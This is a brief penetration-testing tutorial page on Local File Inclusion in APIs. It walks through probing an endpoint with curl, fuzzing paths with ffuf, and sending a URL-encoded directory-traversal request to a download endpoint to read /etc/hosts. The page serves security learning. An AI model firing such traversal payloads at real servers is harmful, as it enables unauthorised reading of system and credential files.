Local File Inclusion (LFI)

Local File Inclusion (LFI) is an attack that affects web applications and APIs alike. It allows an attacker to read internal files and sometimes execute code on the server via a series of ways, one being Apache Log Poisoning.

Assess the API

Interact to retrieve information

curl http://SERVER_IP:PORT/api

Fuzz API endpoints

Wordlist - common-api-endpoints-mazen160.txt

ffuf -w "api-endpoints-mazen160.txt" -u 'http://SERVER_IP:PORT/api/FUZZ'

Interact with the founded endpoint

curl "http://SERVER_IP:PORT/api/download"

Specify a common file

curl "http://SERVER_IP:PORT/api/download/..%2f..%2f..%2f..%2fetc%2fhosts"

PreviousArbitrary File Upload NextCross-Site Scripting (XSS)

Last updated 5 months ago

hashtagAssess the API

hashtagFuzz API endpoints

hashtagInteract with the founded endpoint

hashtagSpecify a common file

Assess the API

Fuzz API endpoints

Interact with the founded endpoint

Specify a common file